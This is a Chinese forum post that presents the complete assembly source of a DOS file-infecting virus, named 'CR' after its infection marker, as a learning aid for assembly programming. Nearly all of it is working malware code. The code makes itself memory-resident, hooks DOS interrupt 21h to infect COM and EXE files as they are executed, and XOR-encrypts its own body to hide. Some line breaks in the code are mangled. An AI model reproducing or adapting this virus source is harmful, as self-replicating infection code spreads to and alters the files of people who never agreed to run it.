楼主
这个病毒虽然比较简单。但是麻雀虽小,五脏俱全。隐藏,感染,加密等模块应有尽有(只是不会破坏),是一个比较标准的 DOS 病毒,可以感染.EXE(不包括 PE)和.COM 的可执行文件。
如果您希望学习汇编语言,用这个程序作为入门指导倒是比较合适的。
染毒文件会被打上“CR”的标记,我们姑且称它为 CR 病毒吧。
baseoff equ 107h
code
segment
assume cs:code,ds:code,es:code,ss:code
org 100h main:
mov ax,offset begin
jmp ax
db "cr"
begin:
push es
push ds
mov ax,cs
mov ds,ax
mov es,ax
call get_ip
push ax
mov ax,offset encodebegin
jmp short get_ip_end
oldhead
db 0h,4ch,0cdh,21h,6 dup (?)
get_ip
label near
mov bp,sp
mov bx,[bp]
ret get_ip_end:
sub bx,112h
;get current offset
add ax,bx
push ax
pop di
mov si,di
cld
mov cx, offset endtag-offset encodebegin
mov dl, byte ptr [oldhead+bx]
push si decode:
lodsb
xor al,dl
stosb
;decode at runtime
loop decode
retf
;retf
cs:ip=encodebegin
db 62h
db 65h
encodebegin:
mov ax,9f80h
mov es,ax
cmp es:word ptr [virustag-baseoff],7263h
jz alreadyresident
push ds
mov ax,40h
mov ds,ax
mov di,13h
;get free memory
sub word ptr [di],2
pop ds
mov di,0
mov si,bx
add si,baseoff
mov cx,2048
cld
rep movsb
;resident in memory
nop
push bx
mov ax,9f80h
mov ds,ax
mov ax,3521h
int 21h
mov ds:word ptr[oldint21-baseoff],bx
mov dx,bx
mov ds:word ptr[oldint21-baseoff+2h],es
mov dx,offset newint21proc-baseoff
mov ax,2521h
int 21h
mov dx,offset newint12proc-baseoff
mov ax,2512h
int 21h
pop bx
alreadyresident:
mov ax,cs
mov ds,ax
mov es,ax
mov si,offset oldhead
add si,bx
mov di,0100h
cmp cs:word ptr oldhead[bx],6163h
;this is an infected EXE file
jz GotoExe
cld
mov cx,7
rep movsb
pop ds
pop es
cmp cs:word ptr oldhead[bx],4c00h
jz go_out GotoOldHead:
;this is an infected COM file
mov ax,0100h
jmp ax GotoExe:
pop ds
pop es
mov ax,ds
add ax,cs:ini_ss[bx]
;set old ss
add ax,10h
mov ss,ax
mov ax,cs:ini_sp[bx]
;set old sp
mov sp,ax
mov ax,ds
add ax,10h
add cs:ini_cs[bx],ax
;set old cs
jmp cs:dword ptr ini_ip[bx]
;jump to the normal EXE
go_out:
mov ah,4ch
int 21h
oldint21 dw 2 dup(?) filehead db 18h dup (?) filesize dw 2 dup(?) virustag db "cr" infecthead:
mov ax,offset begin
jmp ax
db "cr" temp
dw ?
ini_ip
dw ? ini_cs
dw ? ini_ss
dw ? ini_sp
dw ?
newint21proc:
cmp ah,4bh
jz tryinfect
jmp int21h tryinfect:
push ax
;begin to infect
push cx
push es
push di
push bx
push dx
push ds
mov ax,3d02h
int 21h
jnc openok
jmp notinfect
;open fail? not infect openok:
push ds
push dx
push cs
pop ds
mov dx,offset filehead-baseoff
mov bx,ax
mov cx,18h
mov ah,3fh
int 21h
pop dx
pop ds
jc closefilenear
;read fail? not infect
mov di,offset filehead-baseoff
mov ax,9f80h
mov es,ax
cmp word ptr es:[di],5a4dh
;"MZ" in head? EXE file...
jnz COM_infect
jmp EXE_infect
COM_infect:
cmp word ptr es:[di+5],7263h
;"cr" in 105h? not infect
jz closefilenear
call getfilesize
cmp dx,0
jnz closefilenear
; file is too big..not infect
cmp ax,63000
ja
closefilenear
; file is too big..not infect
cmp ax,10
jb
closefilenear
; file is too small..not infect
;infect begin,hahahahaha....
jmp infectbegin closefilenear:
jmp closefile infectbegin:
mov ax,9f80h
mov ds,ax
mov es,ax
mov si,offset filehead-baseoff
mov di,offset oldhead-baseoff
mov cx,10
cld
rep movsb
;save the old file head
call addvirustofile
call mov_ptr_to_head
mov di,offset infecthead-baseoff
mov dx,di
inc di
mov cx,word ptr [filesize-baseoff]
add cx,100h
mov word ptr [di],cx
mov cx,7
mov ah,40h
int 21h
closefile:
mov ah,3eh
int 21h
; close the file
notinfect:
pop ds
pop dx
pop bx
pop di
pop es
pop cx
pop ax int21h:
jmp dword ptr cs:[oldint21-baseoff]
getfilesize proc near
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
jc
closefile
mov es:word ptr [filesize-baseoff],ax
mov es:word ptr [filesize-baseoff+2],dx
;save the file size
ret getfilesize endp
addvirustofile proc near
xor dx,dx
mov ah,40h
mov cx,offset encodebegin-offset begin
int 21h
jc closefile
;write fail... not infect
cmp ax,cx
jb closefile
;write fail... not infect
mov cx,(offset endtag-offset encodebegin)/2+(offset endtag-offset encodebegin)MOD 2
mov dl,byte ptr oldhead-baseoff
mov dh,dl
mov di,dx
mov si,offset encodebegin-baseoff
mov dx,offset temp-baseoff encode_myself:
push cx
lodsw
xor ax,di
;encode and then write into file
mov temp-baseoff,ax
mov ah,40h
mov cx,2
int 21h
jc closefile
;write fail... not infect
cmp ax,cx
jb closefile
;write fail... not infect
pop cx
loop encode_myself
ret addvirustofile endp
mov_ptr_to_head proc near
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
jc closefile
ret mov_ptr_to_head endp
EXE_infect proc near
mov ax,es:word ptr[di+2]
;exe size in the last sector
mov dx,es:word ptr[di+4]
;total sectors of exe size
push di
dec dx
mov cx,9
xor si,si get_size_in_head:
shl dx,1
shl si,1
adc si,0
loop get_size_in_head
add dx,ax
adc si,0
mov di,dx
call getfilesize
;get the exe file size
cmp dx,si
jnz exe_end_near
;not equal(file size and loading size)
cmp dx,0fh
;not infect
ja
exe_end_near
cmp ax,di
pop di
jnz exe_end_near
jmp begininfectexe exe_end_near:
jmp exe_end
;begin to infect exe begininfectexe:
mov ax,writesize+10
mov cl,9
add ax,es:word ptr[di+2]
;add exe loading size
mov si,ax
and ax,1ffh
mov es:word ptr[di+2],ax
shr si,cl
add es:word ptr[di+4],si
push es
pop ds
mov word ptr[oldhead-baseoff],6163h
;write EXE"s tag
mov ax,[di+14h]
mov [ini_ip-baseoff],ax
mov ax,[di+16h]
mov [ini_cs-baseoff],ax
mov ax,[di+10h]
mov [ini_sp-baseoff],ax
mov ax,[di+0eh]
mov [ini_ss-baseoff],ax
;save the old ss,sp,cs,ip
push di
call addvirustofile
pop di
call mov_ptr_to_head
mov ax,filesize-baseoff
mov dx,[di+08h]
mov cl,4
shl dx,cl
;dx=exe header size
sub ax,dx
push ax
and ax,0fh
mov [di+14h],ax
;modify sp,ip
mov [di+10h],writesize+50
add word ptr [di+0ah],writesize/16+1
;add the memory needed
pop ax
mov dx,filesize+2-baseoff
mov cl,4 modify_cs:
shr dx,1
rcr ax,1
loop modify_cs
mov [di+16h],ax
mov [di+0eh],ax
;modify cs and ss
mov dx,di
mov cx,18h
mov ah,40h
int 21h
exe_end:
jmp closefile EXE_infect endp
newint12proc:
mov ax,640
iret writesize
equ $-begin endtag: code
ends
end main
相关热词搜索: 例文 汇编 病毒